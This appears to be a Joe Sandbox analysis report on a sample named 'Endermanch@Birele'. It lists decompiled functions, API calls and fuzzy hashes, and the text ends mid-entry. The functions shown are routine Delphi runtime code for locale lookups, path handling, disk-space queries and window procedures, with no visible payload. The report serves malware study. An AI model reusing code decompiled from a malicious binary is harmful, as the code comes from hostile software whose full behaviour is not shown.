                                                                                                          				return _v16;
                                                                                                          			}



















                                                                                                          0x00404904
                                                                                                          0x00404907
                                                                                                          0x0040490d
                                                                                                          0x0040491a
                                                                                                          0x0040491e
                                                                                                          0x00404960
                                                                                                          0x00404966
                                                                                                          0x004049a3
                                                                                                          0x00000000
                                                                                                          0x00404968
                                                                                                          0x0040496f
                                                                                                          0x00404980
                                                                                                          0x00404985
                                                                                                          0x0040498b
                                                                                                          0x00404993
                                                                                                          0x00404998
                                                                                                          0x004049a6
                                                                                                          0x004049a8
                                                                                                          0x004049ae
                                                                                                          0x004049b2
                                                                                                          0x004049b9
                                                                                                          0x004049ba
                                                                                                          0x00404a65
                                                                                                          0x004049cc
                                                                                                          0x004049d0
                                                                                                          0x004049dd
                                                                                                          0x004049e4
                                                                                                          0x004049e5
                                                                                                          0x004049ee
                                                                                                          0x004049ef
                                                                                                          0x00404a07
                                                                                                          0x00404a0c
                                                                                                          0x00404a0f
                                                                                                          0x00404a14
                                                                                                          0x00404a1a
                                                                                                          0x00404a1b
                                                                                                          0x00404a2b
                                                                                                          0x00404a2d
                                                                                                          0x00404a3d
                                                                                                          0x00404a44
                                                                                                          0x00404a4e
                                                                                                          0x00404a4f
                                                                                                          0x00404a54
                                                                                                          0x00404a5a
                                                                                                          0x00404a5b
                                                                                                          0x00404a61
                                                                                                          0x00404a63
                                                                                                          0x00000000
                                                                                                          0x00404a63
                                                                                                          0x00404a2b
                                                                                                          0x00404a0c
                                                                                                          0x00000000
                                                                                                          0x004049dd
                                                                                                          0x00404a71
                                                                                                          0x00404a78
                                                                                                          0x00404a7c
                                                                                                          0x00404a7d
                                                                                                          0x00404a7d
                                                                                                          0x00404998
                                                                                                          0x00404985
                                                                                                          0x0040496f
                                                                                                          0x00404920
                                                                                                          0x0040492b
                                                                                                          0x0040492f
                                                                                                          0x00000000
                                                                                                          0x00404931
                                                                                                          0x00404931
                                                                                                          0x0040493c
                                                                                                          0x00404940
                                                                                                          0x00404945
                                                                                                          0x00000000
                                                                                                          0x00404947
                                                                                                          0x0040494a
                                                                                                          0x00404951
                                                                                                          0x00404955
                                                                                                          0x00404956
                                                                                                          0x00404956
                                                                                                          0x00404945
                                                                                                          0x0040492f
                                                                                                          0x00404a82
                                                                                                          0x00404a8b

                                                                                                          APIs
                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00404915
                                                                                                          • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00404926
                                                                                                          • lstrcpyn.KERNEL32(?,?,?), ref: 00404956
                                                                                                          • lstrcpyn.KERNEL32(?,?,?,kernel32.dll), ref: 004049BA
                                                                                                          • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll), ref: 004049EF
                                                                                                          • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 00404A02
                                                                                                          • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 00404A0F
                                                                                                          • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 00404A1B
                                                                                                          • lstrcpyn.KERNEL32(0000005D,?,00000104), ref: 00404A4F
                                                                                                          • lstrlen.KERNEL32(?,0000005D,?,00000104), ref: 00404A5B
                                                                                                          • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104), ref: 00404A7D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                          • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                          • API String ID: 3245196872-1565342463
                                                                                                          • Opcode ID: 51cc53dd29fc10e980978c6e8c5ef7c5ec2b63acdc9323cba57404894a6f7bcd
                                                                                                          • Instruction ID: 7c871d1f50c99334550fd3d29ee73b611cb0501c60b53655845a1ea95b6ba134
                                                                                                          • Opcode Fuzzy Hash: 51cc53dd29fc10e980978c6e8c5ef7c5ec2b63acdc9323cba57404894a6f7bcd
                                                                                                          • Instruction Fuzzy Hash: C84166B2E00159ABDB11DAA9CC85BDF77ACDF84314F1401FBAA48F7281D6389F408B58
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E00405435(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
                                                                                                          				long _t11;
                                                                                                          				void* _t16;
                                                                                                          
                                                                                                          				_t16 = __ebx;
                                                                                                          				 *__edi =  *__edi + __ecx;
                                                                                                          				 *((intOrPtr*)(__eax - 0x4195b4)) =  *((intOrPtr*)(__eax - 0x4195b4)) + __eax - 0x4195b4;
                                                                                                          				 *0x41800c = 2;
                                                                                                          				 *0x419014 = 0x401168;
                                                                                                          				 *0x419018 = 0x401170;
                                                                                                          				 *0x419046 = 2;
                                                                                                          				 *0x419000 = E004045F4;
                                                                                                          				if(E00402D68() != 0) {
                                                                                                          					_t3 = E00402D98();
                                                                                                          				}
                                                                                                          				E00402E5C(_t3);
                                                                                                          				 *0x41904c = 0xd7b0;
                                                                                                          				 *0x419218 = 0xd7b0;
                                                                                                          				 *0x4193e4 = 0xd7b0;
                                                                                                          				 *0x41903c = GetCommandLineA();
                                                                                                          				 *0x419038 = E00401288();
                                                                                                          				if((GetVersion() & 0x80000000) == 0x80000000) {
                                                                                                          					 *0x4195b8 = E0040536C(GetThreadLocale(), _t16, __eflags);
                                                                                                          				} else {
                                                                                                          					if((GetVersion() & 0x000000ff) <= 4) {
                                                                                                          						 *0x4195b8 = E0040536C(GetThreadLocale(), _t16, __eflags);
                                                                                                          					} else {
                                                                                                          						 *0x4195b8 = 3;
                                                                                                          					}
                                                                                                          				}
                                                                                                          				_t11 = GetCurrentThreadId();
                                                                                                          				 *0x419030 = _t11;
                                                                                                          				return _t11;
                                                                                                          			}





                                                                                                          0x00405435
                                                                                                          0x0040543a
                                                                                                          0x0040543f
                                                                                                          0x00405441
                                                                                                          0x00405448
                                                                                                          0x00405452
                                                                                                          0x0040545c
                                                                                                          0x00405463
                                                                                                          0x00405474
                                                                                                          0x00405476
                                                                                                          0x00405476
                                                                                                          0x0040547b
                                                                                                          0x00405480
                                                                                                          0x00405489
                                                                                                          0x00405492
                                                                                                          0x004054a0
                                                                                                          0x004054aa
                                                                                                          0x004054be
                                                                                                          0x004054f7
                                                                                                          0x004054c0
                                                                                                          0x004054ce
                                                                                                          0x004054e6
                                                                                                          0x004054d0
                                                                                                          0x004054d0
                                                                                                          0x004054d0
                                                                                                          0x004054ce
                                                                                                          0x004054fc
                                                                                                          0x00405501
                                                                                                          0x00405506

                                                                                                          APIs
                                                                                                            • Part of subcall function 00402D68: GetKeyboardType.USER32(00000000), ref: 00402D6D
                                                                                                            • Part of subcall function 00402D68: GetKeyboardType.USER32(00000001), ref: 00402D79
                                                                                                          • GetCommandLineA.KERNEL32 ref: 0040549B
                                                                                                          • GetVersion.KERNEL32 ref: 004054AF
                                                                                                          • GetVersion.KERNEL32 ref: 004054C0
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 004054FC
                                                                                                            • Part of subcall function 00402D98: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402DBA
                                                                                                            • Part of subcall function 00402D98: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402E09,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402DED
                                                                                                            • Part of subcall function 00402D98: RegCloseKey.ADVAPI32(?,00402E10,00000000,?,00000004,00000000,00402E09,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402E03
                                                                                                          • GetThreadLocale.KERNEL32 ref: 004054DC
                                                                                                            • Part of subcall function 0040536C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004053D2), ref: 00405392
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                                                          • String ID: 04`
                                                                                                          • API String ID: 3734044017-766684717
                                                                                                          • Opcode ID: 30dbc7de0d53211cd3278350da8c956f3bbca0a2c0d773b3d694e31fe2b0271e
                                                                                                          • Instruction ID: e6f4b8ea23552cf43e9109a140cdc7762c01cbdf17e763038c1a1c6d8689ef86
                                                                                                          • Opcode Fuzzy Hash: 30dbc7de0d53211cd3278350da8c956f3bbca0a2c0d773b3d694e31fe2b0271e
                                                                                                          • Instruction Fuzzy Hash: 47015EB180430199D710BFB299A53C93EA1AB09348F14C47FE540BA2F2DB7C0E849B6F
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 82%
                                                                                                          			E00405E18(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                          				intOrPtr _v20;
                                                                                                          				intOrPtr _v24;
                                                                                                          				intOrPtr _v28;
                                                                                                          				struct HWND__* _v32;
                                                                                                          				intOrPtr _t19;
                                                                                                          				intOrPtr* _t20;
                                                                                                          				long _t25;
                                                                                                          				long _t26;
                                                                                                          				struct HWND__* _t29;
                                                                                                          				intOrPtr _t34;
                                                                                                          				long _t35;
                                                                                                          
                                                                                                          				_t34 = _a8;
                                                                                                          				_t29 = _a4;
                                                                                                          				_v32 = _t29;
                                                                                                          				_v28 = _t34;
                                                                                                          				_v24 = _a12;
                                                                                                          				_v20 = _a16;
                                                                                                          				_t35 = 0;
                                                                                                          				if(_t29 != 0) {
                                                                                                          					if( *0x4198b8 == 0) {
                                                                                                          						_t35 = GetWindowLongA(_t29, 0xffffffeb);
                                                                                                          					} else {
                                                                                                          						_t35 =  *0x4198b8; // 0x0
                                                                                                          						_t25 =  *0x4198b8; // 0x0
                                                                                                          						 *(_t25 + 0x1c) = _t29;
                                                                                                          						_t26 =  *0x4198b8; // 0x0
                                                                                                          						SetWindowLongA(_t29, 0xffffffeb, _t26);
                                                                                                          						 *0x4198b8 = 0;
                                                                                                          					}
                                                                                                          				}
                                                                                                          				if(_t35 == 0) {
                                                                                                          					if( *0x4198a8 == 0) {
                                                                                                          						_push(_a16);
                                                                                                          						_t19 = _a12;
                                                                                                          						_push(_t19);
                                                                                                          						_push(_t34);
                                                                                                          						_push(_t29);
                                                                                                          						L00405B4C();
                                                                                                          						return _t19;
                                                                                                          					}
                                                                                                          					_t20 =  *0x4198a8; // 0x20a0a88
                                                                                                          					return  *((intOrPtr*)( *_t20 + 0x14))();
                                                                                                          				} else {
                                                                                                          					return  *((intOrPtr*)( *_t35 + 0x14))();
                                                                                                          				}
                                                                                                          			}














                                                                                                          0x00405e21
                                                                                                          0x00405e24
                                                                                                          0x00405e27
                                                                                                          0x00405e2a
                                                                                                          0x00405e30
                                                                                                          0x00405e36
                                                                                                          0x00405e39
                                                                                                          0x00405e3d
                                                                                                          0x00405e46
                                                                                                          0x00405e75
                                                                                                          0x00405e48
                                                                                                          0x00405e48
                                                                                                          0x00405e4e
                                                                                                          0x00405e53
                                                                                                          0x00405e56
                                                                                                          0x00405e5f
                                                                                                          0x00405e66
                                                                                                          0x00405e66
                                                                                                          0x00405e46
                                                                                                          0x00405e79
                                                                                                          0x00405e8e
                                                                                                          0x00405ea2
                                                                                                          0x00405ea3
                                                                                                          0x00405ea6
                                                                                                          0x00405ea7
                                                                                                          0x00405ea8
                                                                                                          0x00405ea9
                                                                                                          0x00000000
                                                                                                          0x00405ea9
                                                                                                          0x00405e93
                                                                                                          0x00000000
                                                                                                          0x00405e7b
                                                                                                          0x00000000
                                                                                                          0x00405e82

                                                                                                          APIs
                                                                                                          • SetWindowLongA.USER32(?,000000EB,00000000), ref: 00405E5F
                                                                                                          • GetWindowLongA.USER32(?,000000EB), ref: 00405E70
                                                                                                          • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00405EA9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Long$NtdllProc_
                                                                                                          • String ID:
                                                                                                          • API String ID: 3674618424-0
                                                                                                          • Opcode ID: b42eebfffb6e20d70fd9a83d10bc150c47e558780fdbeb76c2f0d94f498b7c3b
                                                                                                          • Instruction ID: dc2942c20767724d99ff90191b4740557241c23ab1819c43c1dfcbe988e2a9eb
                                                                                                          • Opcode Fuzzy Hash: b42eebfffb6e20d70fd9a83d10bc150c47e558780fdbeb76c2f0d94f498b7c3b
                                                                                                          • Instruction Fuzzy Hash: 96113A719106099FCB10DF59D890DEBB7F8EB49310F14453AE816A73A1D734AE41CFAA
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 46%
                                                                                                          			E0040D970(int __eax, void* __ebx, void* __eflags) {
                                                                                                          				char _v11;
                                                                                                          				char _v16;
                                                                                                          				intOrPtr _t28;
                                                                                                          				void* _t31;
                                                                                                          				void* _t33;
                                                                                                          
                                                                                                          				_t33 = __eflags;
                                                                                                          				_v16 = 0;
                                                                                                          				_push(_t31);
                                                                                                          				_push(0x40d9d4);
                                                                                                          				_push( *[fs:edx]);
                                                                                                          				 *[fs:edx] = _t31 + 0xfffffff4;
                                                                                                          				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
                                                                                                          				E00403C1C( &_v16, 7,  &_v11);
                                                                                                          				_push(_v16);
                                                                                                          				E00409A90(7, GetACP(), _t33);
                                                                                                          				_pop(_t28);
                                                                                                          				 *[fs:eax] = _t28;
                                                                                                          				_push(E0040D9DB);
                                                                                                          				return E004039AC( &_v16);
                                                                                                          			}








                                                                                                          0x0040d970
                                                                                                          0x0040d979
                                                                                                          0x0040d97e
                                                                                                          0x0040d97f
                                                                                                          0x0040d984
                                                                                                          0x0040d987
                                                                                                          0x0040d996
                                                                                                          0x0040d9a6
                                                                                                          0x0040d9ae
                                                                                                          0x0040d9b7
                                                                                                          0x0040d9c0
                                                                                                          0x0040d9c3
                                                                                                          0x0040d9c6
                                                                                                          0x0040d9d3

                                                                                                          APIs
                                                                                                          • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040D9D4), ref: 0040D996
                                                                                                          • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0040D9D4), ref: 0040D9AF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InfoLocale
                                                                                                          • String ID:
                                                                                                          • API String ID: 2299586839-0
                                                                                                          • Opcode ID: 011056b1ef29244b933e296bdf217f967ef22e169aa41a9c2c1fe912db5155c7
                                                                                                          • Instruction ID: 2aa0a149cccc3bdad8f1107e872499380b71667bab33c2c34ff897829838605f
                                                                                                          • Opcode Fuzzy Hash: 011056b1ef29244b933e296bdf217f967ef22e169aa41a9c2c1fe912db5155c7
                                                                                                          • Instruction Fuzzy Hash: FDF09671E04608ABE700EEE2D85299EB7AEE7C5718F50C57AB110E75C1DA7C66048A58
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E00409E5A(CHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
                                                                                                          				long _v8;
                                                                                                          				long _v12;
                                                                                                          				long _v16;
                                                                                                          				long _v20;
                                                                                                          				intOrPtr _v24;
                                                                                                          				signed int _v28;
                                                                                                          				CHAR* _t25;
                                                                                                          				int _t26;
                                                                                                          				intOrPtr _t31;
                                                                                                          				intOrPtr _t34;
                                                                                                          				intOrPtr* _t39;
                                                                                                          				intOrPtr* _t40;
                                                                                                          				intOrPtr _t48;
                                                                                                          				intOrPtr _t50;
                                                                                                          
                                                                                                          				_t25 = _a4;
                                                                                                          				if(_t25 == 0) {
                                                                                                          					_t25 = 0;
                                                                                                          				}
                                                                                                          				_t26 = GetDiskFreeSpaceA(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
                                                                                                          				_v28 = _v8 * _v12;
                                                                                                          				_v24 = 0;
                                                                                                          				_t48 = _v24;
                                                                                                          				_t31 = E004045FC(_v28, _t48, _v16, 0);
                                                                                                          				_t39 = _a8;
                                                                                                          				 *_t39 = _t31;
                                                                                                          				 *((intOrPtr*)(_t39 + 4)) = _t48;
                                                                                                          				_t50 = _v24;
                                                                                                          				_t34 = E004045FC(_v28, _t50, _v20, 0);
                                                                                                          				_t40 = _a12;
                                                                                                          				 *_t40 = _t34;
                                                                                                          				 *((intOrPtr*)(_t40 + 4)) = _t50;
                                                                                                          				return _t26;
                                                                                                          			}

















                                                                                                          0x00409e63
                                                                                                          0x00409e68
                                                                                                          0x00409e6a
                                                                                                          0x00409e6a
                                                                                                          0x00409e7d
                                                                                                          0x00409e8c
                                                                                                          0x00409e8f
                                                                                                          0x00409e9c
                                                                                                          0x00409e9f
                                                                                                          0x00409ea4
                                                                                                          0x00409ea7
                                                                                                          0x00409ea9
                                                                                                          0x00409eb6
                                                                                                          0x00409eb9
                                                                                                          0x00409ebe
                                                                                                          0x00409ec1
                                                                                                          0x00409ec3
                                                                                                          0x00409ecc

                                                                                                          APIs
                                                                                                          • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 00409E7D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DiskFreeSpace
                                                                                                          • String ID:
                                                                                                          • API String ID: 1705453755-0
                                                                                                          • Opcode ID: 394a4979b3ee39f50612be3c2d875f0b1d51c423b50915be9fda06e610967514
                                                                                                          • Instruction ID: 353cd057e2d2ccc385b541749b598d3fb8b705a70165d26d7a4126dbf399a9ae
                                                                                                          • Opcode Fuzzy Hash: 394a4979b3ee39f50612be3c2d875f0b1d51c423b50915be9fda06e610967514
                                                                                                          • Instruction Fuzzy Hash: 7511C0B5A00209AFDB04CFA9CD819AFB7F9FFC8704B14C569A505E7255E6319E018BA4
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 51%
                                                                                                          			E0040536A(int __eax, void* __ebx, void* __eflags) {
                                                                                                          				char _v8;
                                                                                                          				char _v15;
                                                                                                          				char _v20;
                                                                                                          				intOrPtr _t29;
                                                                                                          				void* _t32;
                                                                                                          
                                                                                                          				_v20 = 0;
                                                                                                          				_push(_t32);
                                                                                                          				_push(0x4053d2);
                                                                                                          				_push( *[fs:edx]);
                                                                                                          				 *[fs:edx] = _t32 + 0xfffffff0;
                                                                                                          				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
                                                                                                          				E00403C1C( &_v20, 7,  &_v15);
                                                                                                          				E0040292C(_v20,  &_v8);
                                                                                                          				if(_v8 != 0) {
                                                                                                          				}
                                                                                                          				_pop(_t29);
                                                                                                          				 *[fs:eax] = _t29;
                                                                                                          				_push(E004053D9);
                                                                                                          				return E004039AC( &_v20);
                                                                                                          			}








                                                                                                          0x00405375
                                                                                                          0x0040537a
                                                                                                          0x0040537b
                                                                                                          0x00405380
                                                                                                          0x00405383
                                                                                                          0x00405392
                                                                                                          0x004053a2
                                                                                                          0x004053ad
                                                                                                          0x004053b8
                                                                                                          0x004053b8
                                                                                                          0x004053be
                                                                                                          0x004053c1
                                                                                                          0x004053c4
                                                                                                          0x004053d1

                                                                                                          APIs
                                                                                                          • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004053D2), ref: 00405392
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InfoLocale
                                                                                                          • String ID:
                                                                                                          • API String ID: 2299586839-0
                                                                                                          • Opcode ID: 25750694d5593128750b1eebfc99ba24c29a82bccd3446e8a8c1d8fec2b0ca22
                                                                                                          • Instruction ID: 0be0a7911bf5b0446cdb2ce032f664466e42649fafd2f588c617f3da133872ab
                                                                                                          • Opcode Fuzzy Hash: 25750694d5593128750b1eebfc99ba24c29a82bccd3446e8a8c1d8fec2b0ca22
                                                                                                          • Instruction Fuzzy Hash: 68F0C831A04709AFE715DEA1CC41AAFB3BAF784714F50853AB610F75C0E7F86A04CA58
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 51%
                                                                                                          			E0040536C(int __eax, void* __ebx, void* __eflags) {
                                                                                                          				char _v8;
                                                                                                          				char _v15;
                                                                                                          				char _v20;
                                                                                                          				intOrPtr _t29;
                                                                                                          				void* _t32;
                                                                                                          
                                                                                                          				_v20 = 0;
                                                                                                          				_push(_t32);
                                                                                                          				_push(0x4053d2);
                                                                                                          				_push( *[fs:edx]);
                                                                                                          				 *[fs:edx] = _t32 + 0xfffffff0;
                                                                                                          				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
                                                                                                          				E00403C1C( &_v20, 7,  &_v15);
                                                                                                          				E0040292C(_v20,  &_v8);
                                                                                                          				if(_v8 != 0) {
                                                                                                          				}
                                                                                                          				_pop(_t29);
                                                                                                          				 *[fs:eax] = _t29;
                                                                                                          				_push(E004053D9);
                                                                                                          				return E004039AC( &_v20);
                                                                                                          			}








                                                                                                          0x00405375
                                                                                                          0x0040537a
                                                                                                          0x0040537b
                                                                                                          0x00405380
                                                                                                          0x00405383
                                                                                                          0x00405392
                                                                                                          0x004053a2
                                                                                                          0x004053ad
                                                                                                          0x004053b8
                                                                                                          0x004053b8
                                                                                                          0x004053be
                                                                                                          0x004053c1
                                                                                                          0x004053c4
                                                                                                          0x004053d1

                                                                                                          APIs
                                                                                                          • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004053D2), ref: 00405392
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InfoLocale
                                                                                                          • String ID:
                                                                                                          • API String ID: 2299586839-0
                                                                                                          • Opcode ID: c8828c61744f429c8b2be1a0e7de400017bd723991f45ebc2beacf15804416dd
                                                                                                          • Instruction ID: bbf7e57d19a665a2ead527aeb7a48f0986b69c40f5de68d8c1f48b0b2d2594e4
                                                                                                          • Opcode Fuzzy Hash: c8828c61744f429c8b2be1a0e7de400017bd723991f45ebc2beacf15804416dd
                                                                                                          • Instruction Fuzzy Hash: 4EF0C831A04709AFE715DEA1CC41AAFB37AF784714F50853AB610B75C0E7F82A04CA58
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E0040C51C(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
                                                                                                          				char _v260;
                                                                                                          				intOrPtr _t10;
                                                                                                          				void* _t18;
                                                                                                          
                                                                                                          				_t18 = __ecx;
                                                                                                          				_t10 = _a4;
                                                                                                          				if(GetLocaleInfoA(__eax, __edx,  &_v260, 0x100) <= 0) {
                                                                                                          					return E00403A00(_t10, _t18);
                                                                                                          				}
                                                                                                          				return E00403A9C(_t10, _t5 - 1,  &_v260);
                                                                                                          			}






                                                                                                          0x0040c527
                                                                                                          0x0040c529
                                                                                                          0x0040c541
                                                                                                          0x00000000
                                                                                                          0x0040c559
                                                                                                          0x00000000

                                                                                                          APIs
                                                                                                          • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C53A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InfoLocale
                                                                                                          • String ID:
                                                                                                          • API String ID: 2299586839-0
                                                                                                          • Opcode ID: 403862077fdab618eabd83d9d598232319b368ff89b0beec69ed99e6c8cbbc2f
                                                                                                          • Instruction ID: 629025c6126e800fe5dd8d644b77647399d5d3ed201a2754f2a82a1c5cf6e0b2
                                                                                                          • Opcode Fuzzy Hash: 403862077fdab618eabd83d9d598232319b368ff89b0beec69ed99e6c8cbbc2f
                                                                                                          • Instruction Fuzzy Hash: 42E0923170021867D310AA694C86AE6725C9758310F4042BFB949E73C1EDB8EE4046ED
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 79%
                                                                                                          			E0040C568(int __eax, char __ecx, int __edx) {
                                                                                                          				char _v16;
                                                                                                          				char _t5;
                                                                                                          				char _t6;
                                                                                                          
                                                                                                          				_push(__ecx);
                                                                                                          				_t6 = __ecx;
                                                                                                          				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
                                                                                                          					_t5 = _t6;
                                                                                                          				} else {
                                                                                                          					_t5 = _v16;
                                                                                                          				}
                                                                                                          				return _t5;
                                                                                                          			}






                                                                                                          0x0040c56b
                                                                                                          0x0040c56c
                                                                                                          0x0040c582
                                                                                                          0x0040c589
                                                                                                          0x0040c584
                                                                                                          0x0040c584
                                                                                                          0x0040c584
                                                                                                          0x0040c58f

                                                                                                          APIs
                                                                                                          • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040DC82,00000000,0040DE9B,?,?,00000000,00000000), ref: 0040C57B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InfoLocale
                                                                                                          • String ID:
                                                                                                          • API String ID: 2299586839-0
                                                                                                          • Opcode ID: 2e073c2160cb2ef527fe9edc8b84b13da2276b747e0507acb7b09c33265cf4bd
                                                                                                          • Instruction ID: a9bc703ae7e4bd91a4003b8fe53232cbf41663b377f0762b65b213ba23526b64
                                                                                                          • Opcode Fuzzy Hash: 2e073c2160cb2ef527fe9edc8b84b13da2276b747e0507acb7b09c33265cf4bd
